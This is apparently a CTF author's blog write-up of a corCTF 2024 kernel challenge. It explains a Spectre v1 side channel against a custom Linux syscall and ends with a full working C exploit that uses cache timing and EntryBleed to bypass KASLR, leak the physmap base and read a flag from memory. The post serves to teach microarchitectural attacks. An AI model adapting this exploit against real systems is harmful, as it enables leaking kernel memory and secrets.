Search This Blog

Sunday, August 4, 2024

corCTF 2024: Its Just a Dos Bug Bro - Leaking Flags from Filesystem with Spectre v1

Following the theme of corCTF 2023, I wanted to release another exploitation challenge that connects kernel internals and modern x86_64 micro-architectural attacks. For this year, the players were presented with the following new syscall on Linux version 6.9.0.

#include <linux/kernel.h> #include <linux/init.h> #include <linux/sched.h> #include <linux/syscalls.h> #include <linux/string.h> char corctf_note[0x10] = {0}; SYSCALL_DEFINE2(corctf_write_note, char *, addr, size_t, size) { if (size > sizeof(corctf_note) - 1) return -EINVAL; return copy_from_user(corctf_note, addr, size); } SYSCALL_DEFINE4(corctf_read_note, char *, addr, uint64_t, idx1, uint64_t, idx2, uint64_t, stride) { uint64_t off = corctf_note[idx1]; if (strlen(corctf_note) > idx1 && strlen(corctf_note) > idx2) { return copy_to_user(addr + (off << stride), corctf_note + idx2, 1); } else { return -EINVAL; } }

The kernel only ran off of an initramfs with the following QEMU boot command:  

#!/bin/sh qemu-system-x86_64 \ -s \ -m 512 \ -smp 1 \ -nographic \ -kernel "bzImage" \ -append "console=ttyS0 loglevel=3 panic=-1 oops=panic clearcpuid=smap pti=on no5lvl" \ -no-reboot \ -netdev user,id=net \ -cpu host \ -initrd "./initramfs.cpio.gz" \ -enable-kvm

As mentioned to the players, the challenge was hosted on an i5-8250U, an 8th generation Intel CPU (though worked locally on 9th and 10th generation CPUs). I also made it clear to players to set the Linux scaling_governor to performance (echo performance | sudo tee /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor) - the intended micro-architectural side-channel exploit struggled to work reliably when in powersave mode.

Based on the syscall implementation, there is a pretty clear OOB read bug in corctf_read_note. Hopefully, no one tried to rely solely on that vulnerability to write an LPE exploit. I’m pretty sure this can only result in a DOS bug due to oops=panic, but if you can pwn the Linux kernel with only one use of this primitive, please contact me.

This syscall implementation’s also has a side-channel problem. The access of the user controlled buffer in copy_to_user depends on a value derived from a user controlled index. Attackers can deduce the value of any memory location relative to corctf_note with a cache side-channel through the unchecked index. If one were to evict this entire user buffer from the CPU cache hierarchy beforehand, then this syscall could bring regions of it back into the cache with the off dependent access. An attacker can then measure access times over its buffer to determine the original value of off based off of which user buffer region is the fastest to access. This gives away memory value information as the value of off comes from the unchecked index into corctf_note.

One might wonder how the user-buffer would even be accessed given an OOB index. Afterall, there is a conditional check that blocks OOB accesses afterwards. This is where the original insight from Spectre v1 comes in. Modern CPUs are extremely aggressive with optimizations and execute as many instructions and as far in advance as possible - it’s perfectly fine to execute instructions out of order internally as long as the final results remain architecturally correct. Conditional branches awaiting resolution can’t just halt the entire pipeline, so modern micro-architectures employ a branch predictor that assumes a certain direction based on history at the branch address. Sometimes, the prediction is wrong, so the CPU will have to rollback state, but micro-architectural state such as caching are not rolled back (it would be very hard to do so without seriously hindering performance).

In this case, if one were to train this branch to always take the copy_to_user path, then an OOB index will cause this path to be taken transiently. The cache side-channel becomes a race condition between branch resolution (which depends on calls to strlen on corctf_note) and the caching of an off dependent user buffer address (which depends on the speed of the shift calculation and the MMU resolution of the buffer’s virtual address).

One common misconception I observed during the CTF was people thinking that KPTI and modern kernel mitigations have fixed Spectre v1. This is simply not true, as KPTI was meant to address Meltdown (not completely though), and Spectre v1 cannot be mitigated as branch prediction is a fundamental modern CPU optimization. As discussed in a Linux kernel document, one can mitigate Spectre with the help of the nospec macro family (like array_index_nospec) that helps stop speculative execution or with the usage of certain barriers. None of that exists in the custom syscall above. Technically, I believe the clac and stac instructions used by usercopy functions to disable and re-enable SMAP have barrier like semantics, but I disabled SMAP in the kernel boot params above.

One last piece of the puzzle remains - how can we use Spectre v1 to leak the flag? Well, initramfs is always loaded in RAM, and its loaded very early on so that it isn’t affected by randomization (at least based on my observations). Given a kernel KASLR leak and a physmap base leak, we can then compute the offset necessary to side-channel out the flag.

I created the following primitives to setup a Spectre v1 based side-channel given a user-controlled buffer.

Since we control the buffer, the easiest way to flush it from the cache on x86_64 is through the clflush instruction.

void clflush(void *addr) { asm volatile(INTEL( "clflush [%[addr]];" )::[addr]"r"(addr):); } void flush_buffer(void *addr, size_t size) { for (off_t i = 0; i < size; i += LINE_SIZE) { clflush(addr + i); } }

To time accesses, I rely on the rdtscp instruction, and use memory fences to help ensure accuracy. 

static inline uint64_t time_access(void *addr) { uint64_t time; asm volatile(INTEL( "mfence;" "rdtscp;" "lfence;" "mov rbx, rax;" "mov rax, %[addr];" "mov rax, qword ptr [rax];" "rdtscp;" "lfence;" "sub rax, rbx;" "mov %[time], rax;") :[time]"=r"(time):[addr]"r"(addr): "rax", "rdx", "rcx", "rbx", "rsi", "rdi"); return time; }

Now for the main “Spectre” function to train the branch predictor:

static inline uint64_t spectre(char *buffer, off_t offset, uint64_t idx, uint64_t train, uint64_t bound) { for (int i = 0; i < strlen(tlb_smart_write); i++){ corctf_read(buffer, i); } for (int i = 0; i < train; i++){ corctf_read(buffer, 0xd); } flush_buffer((void *)buffer, MAP_SIZE); asm volatile ("mfence;"); corctf_read(buffer, idx); return get_time(buffer, offset); }

I set up tlb_smart_write to be \x01\x21\x41\x61\x81\xa1\xc1\xe1skibidi (apologies for the zoomer brainrot, I was under an extreme time crunch this year for corCTF development). The first for loop thus has the syscall use each of those values as the offset into the user-buffer - as you will see later, I indexed into the user buffer by strides of 128 bytes (which provided cleaner results than 64 byte strides for me), so this acts as a mechanism to have the buffer virtual addresses resolved in the TLB beforehand (which would help win the aforementioned Spectre race window). Despite kPTI being on, modern Intel CPUs have the PCID feature as a performance optimization, so those addresses are not flushed from the TLB on user kernel transitions.

Afterwards, I trained the branch predictor for a few times, before flushing the entire user buffer from the whole cache hierarchy, triggering a mis-speculation with an evil index, and timing the access to a pre-specified offset in the buffer. Note that the index is to the memory location we want to leak, and offset is an address in the user buffer we are currently timing for data collection.

With the above primitives, I created the following side-channel primitive:

uint64_t sidechannel(char *buffer, uint64_t train, uint64_t evil, uint64_t bound) { uint64_t time[CHAR_SPACE] = {0}; for (int times = 0; times < ITERS; times++) { for (uint32_t i = 0; i < bound; i++) { uint64_t t = spectre(buffer, i * STRIDE, evil, train, bound); if (t < THRESHOLD) time[i]++; } } uint64_t max_val = 0, max = -1; for (int i = 0; i < bound; i++) { if (time[i] > max_val) { max = i; max_val = time[i]; } } if (max != -1) { for (int i = 0; i < bound; i++) { printf("0x%02x: %lu, ", i, time[i]); if ((i + 1) % 16 == 0) { puts(""); } } puts(""); } return max; }

It is always better to use a threshold scoring technique as seen above in micro-architectural side-channels, as averages are too susceptible to noise and outliers. While this might not be an issue because DRAM has quite a large timing difference when compared to a generic cached access, a threshold scoring technique would definitely fair much better if clflush was unavailable. Rather than evicting the buffer from the L3 cache into DRAM by “filling” the L3 cache between 1-2 times (as caches are not truly LRU and have other heuristics), we can just evict the buffer from L1 and L2 cache, which takes substantially less accesses. The L2 to L3 timing difference can then be noticed through a threshold metric.

Now, armed with all these primitives, we can construct a Spectre v1 exploit to leak the flag from the filesystem cache.

To leak kernel physmap base, we can just side-channel out the contents of page_offset_base, which will be at a fixed offset from corctf_note as both are in the kernel .data section. I noticed that page_offset_base‘s address also seems to be cached (at least in the TLB), as the kernel is probably using addresses near it quite frequently. A similar idea can be done with a kernel text/data pointer to leak KASLR. However, I opted for an easier approach with the EntryBleed KASLR bypass side-channel, which I discuss in this post and in this paper.

With both address leaks in hand and knowledge of the file offset from physical memory base (which you determine beforehand through a memory search in QEMU monitor mode), the flag can be leaked. Here is the final exploit:

 #include <stdio.h> #include <stdbool.h> #include <stdlib.h> #include <stdint.h> #include <unistd.h> #include <errno.h> #include <fcntl.h> #include <string.h> #include <sys/mman.h> #include <sys/syscall.h> #define __NR_CORCTF_WRITE 462 #define __NR_CORCTF_READ 463 #define LINE_SIZE 64 #define STRIDE_SHIFT 7 #define STRIDE (1 << STRIDE_SHIFT) #define MAP_SIZE STRIDE * 256 #define CACHE_SIZE 24 * (1 << 21) #define CHAR_SPACE 256 #define INTEL(x) \ ".intel_syntax noprefix;" \ x \ ".att_syntax;" uint8_t tlb_smart_write[0x10] = "\x01\x21\x41\x61\x81\xa1\xc1\xe1skibidi"; void fail(char *msg) { perror(msg); exit(1); } uint64_t entrybleed(uint64_t addr) { uint64_t a, b, c, d; asm volatile (".intel_syntax noprefix;" "mfence;" "rdtscp;" "mov %0, rax;" "mov %1, rdx;" "xor rax, rax;" "lfence;" "prefetchnta qword ptr [%4];" "prefetcht2 qword ptr [%4];" "xor rax, rax;" "lfence;" "rdtscp;" "mov %2, rax;" "mov %3, rdx;" "mfence;" ".att_syntax;" : "=r" (a), "=r" (b), "=r" (c), "=r" (d) : "r" (addr) : "rax", "rbx", "rcx", "rdx"); a = (b << 32) | a; c = (d << 32) | c; return c - a; } #define STEP 0x100000ull #define SCAN_START KERNEL_LOWER_BOUND + entry_SYSCALL_64_offset #define SCAN_END KERNEL_UPPER_BOUND + entry_SYSCALL_64_offset #define KERNEL_LOWER_BOUND 0xffffffff80000000ull #define KERNEL_UPPER_BOUND 0xffffffffc0000000ull #define entry_SYSCALL_64_offset 0x1000000ull #define DUMMY_ITERATIONS 5 #define ITERATIONS 100 #define ARR_SIZE (SCAN_END - SCAN_START) / STEP uint64_t leak_syscall_entry(void) { uint64_t data[ARR_SIZE] = {0}; uint64_t min = ~0, addr = ~0; for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++) { for (uint64_t idx = 0; idx < ARR_SIZE; idx++) { uint64_t test = SCAN_START + idx * STEP; syscall(104); uint64_t time = entrybleed(test); if (i >= DUMMY_ITERATIONS) data[idx] += time; } } for (int i = 0; i < ARR_SIZE; i++) { data[i] /= ITERATIONS; if (data[i] < min) { min = data[i]; addr = SCAN_START + i * STEP; } } return addr; } uint64_t leak_kaslr(void) { return leak_syscall_entry() - entry_SYSCALL_64_offset; } long corctf_write(char *addr, uint64_t size) { return syscall(__NR_CORCTF_WRITE, addr, size); } long corctf_read(char *addr, uint64_t idx) { return syscall(__NR_CORCTF_READ, addr, idx, 0, STRIDE_SHIFT); } void clflush(void *addr) { asm volatile(INTEL( "clflush [%[addr]];" )::[addr]"r"(addr):); } void flush_buffer(void *addr, size_t size) { for (off_t i = 0; i < size; i += LINE_SIZE) { clflush(addr + i); } } static inline uint64_t time_access(void *addr) { uint64_t time; asm volatile(INTEL( "mfence;" "rdtscp;" "lfence;" "mov rbx, rax;" "mov rax, %[addr];" "mov rax, qword ptr [rax];" "rdtscp;" "lfence;" "sub rax, rbx;" "mov %[time], rax;") :[time]"=r"(time):[addr]"r"(addr): "rax", "rdx", "rcx", "rbx", "rsi", "rdi"); return time; } static inline uint64_t get_time(char *buffer, off_t offset) { return time_access(buffer + offset); } #define TRAIN 7 static inline uint64_t spectre(char *buffer, off_t offset, uint64_t idx, uint64_t train, uint64_t bound) { for (int i = 0; i < strlen(tlb_smart_write); i++){ corctf_read(buffer, i); } for (int i = 0; i < train; i++){ corctf_read(buffer, 0xd); } flush_buffer((void *)buffer, MAP_SIZE); asm volatile ("mfence;"); corctf_read(buffer, idx); return get_time(buffer, offset); } #define THRESHOLD 100 #define ITERS 1000 uint64_t sidechannel(char *buffer, uint64_t train, uint64_t evil, uint64_t bound) { uint64_t time[CHAR_SPACE] = {0}; for (int times = 0; times < ITERS; times++) { for (uint32_t i = 0; i < bound; i++) { uint64_t t = spectre(buffer, i * STRIDE, evil, train, bound); if (t < THRESHOLD) time[i]++; } } uint64_t max_val = 0, max = -1; for (int i = 0; i < bound; i++) { if (time[i] > max_val) { max = i; max_val = time[i]; } } if (max != -1) { for (int i = 0; i < bound; i++) { printf("0x%02x: %lu, ", i, time[i]); if ((i + 1) % 16 == 0) { puts(""); } } puts(""); } return max; } uint8_t leak_byte_helper(char *buffer, uint64_t offset, uint64_t bound) { uint64_t result = -1; printf("Attemping to leak offset 0x%lx\n", offset); while (result == -1) { result = sidechannel(buffer, TRAIN, offset, bound); if (result == -1) printf("retrying for offset 0x%lx\n", offset); } printf("Leaked: 0x%lx\n", result); return result; } uint8_t leak_byte(char *buffer, uint64_t offset, uint64_t bound) { uint64_t first_leak = 0xdeadbabe; uint64_t second_leak = 0xdeadb00b; while (first_leak != second_leak) { first_leak = leak_byte_helper(buffer, offset, bound); second_leak = leak_byte_helper(buffer, offset, bound); if (first_leak != second_leak) { printf("mismatch in leak values: 0x%lx 0x%lx. retrying\n", first_leak, second_leak); } } return first_leak; } uint64_t leak_physmap(char *buffer, uint64_t offset) { uint64_t qword = 0; for (int i = 3; i < 6; i++) { qword |= ((uint64_t)leak_byte(buffer, offset + i, 256)) << (i * 8); } qword |= 0xffff000000000000ull; return qword; } #define NOTE_OFFSET 0x24d2880ull #define MAX_FLAG_LEN 0x100 #define NOTE_TO_POB 0xffffffffff329978ull void main() { char *flag = malloc(MAX_FLAG_LEN); char *buffer = mmap(0, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); if (!buffer || !flag) { fail("buffer allocation failed"); } memset(flag, 0, MAX_FLAG_LEN); strcpy(flag, "corctf{"); uint64_t kaslr_base = leak_kaslr(); uint64_t note = kaslr_base + NOTE_OFFSET; printf("KASLR base: 0x%lx\n", kaslr_base); printf("note addr: 0x%lx\n", note); printf("page offset base: 0x%lx\n", note + NOTE_TO_POB); corctf_write(tlb_smart_write, strlen(tlb_smart_write)); // bottom 3 bytes always 0, speed it up a bit uint64_t physmap_base = leak_physmap(buffer, NOTE_TO_POB); // uint64_t physmap_base = 0xffff888000000000ull; printf("physmap: 0x%lx\n", physmap_base); uint64_t flag_offset = 0x1f556000ull; // in case another page allocation happened beforehand while (leak_byte(buffer, physmap_base + flag_offset - note, 256) != flag[0]) { puts("wrong first flag char, incrementing flag_offset"); flag_offset += 0x1000; } int i = strlen(flag); uint8_t temp = 0; while ((temp = leak_byte(buffer, physmap_base + flag_offset + i - note, 0x80)) != '}') { flag[i++] = temp; } flag[i] = '}'; printf("flag: %s\n", flag); }

The flag takes about 5-10 minutes to fully leak, but that’s with some form of optimization such as knowledge of the flag format and the range of physmap under 4 level paging.

I originally had a harder version of this challenge too, themed around being bug free rather than a DOS bug.

The syscall looked like this: 

SYSCALL_DEFINE4(corctf_read_note, char *, addr, uint64_t, idx1, uint64_t, idx2, uint64_t, stride) { if (strlen(corctf_note) > idx1 && strlen(corctf_note) > idx2) { uint64_t off = corctf_note[idx1] << stride; return copy_to_user(addr + off, corctf_note + idx2, 1); } else { return -EINVAL; } }

Now, there would never be any OOB access. However, this is a harder side-channel to perform - since the file cache address is not in the CPU cache (and perhaps the TLB as well), it would have been extremely difficult for speculative execution to progress deep enough to leave a cache side-effect for the user buffer. One probable way to go about this is to prolong the speculation window by causing an eviction of corctf_note from the L3 cache and TLB, but the side-channel would probably take too long at that point given normal system noise. I opted to keep the file contents in cache with a “flag verifier daemon” - this challenge ended up working but the side-channel success rate was still much lower. Since it didn’t really introduce any new concepts and just required a player to perform more fine-tuning, I opted for the easier version of the challenge instead.

Overall, I thought this was a really nifty challenge to write and hoped to bring something refreshing to the pwnable category in CTFs. I would like to give a huge shoutout to sampriti for taking first blood on this challenge. Zolutal from Shellphish claimed the second and last solve on this challenge.

Some other challenges I wrote this year for corCTF included trojan-turtles, an L2 guest to L1 hypervisor KVM escape, and vmquack’s combinator in collaboration with anematode, a functional programming VM built around normal evaluation of untyped lambda calculus. I didn’t make a writeup for the latter one as the three solves were pretty much all just pattern match and replace, which I somewhat expected to be the case. It’s a shame though since it involved the highest development effort. I was inspired by this article to write a Scheme to lambda calculus compiler, but the ultimate bottleneck for the crackme’s complexity was the poor runtime reduction performance.

I am looking forward to what comes next for development in corCTF 2025! Feel free to let me know if you have any questions or see any mistakes, and hopefully, I’ll see some of you all for the Defcon Finals afterparty.

No comments:

Post a Comment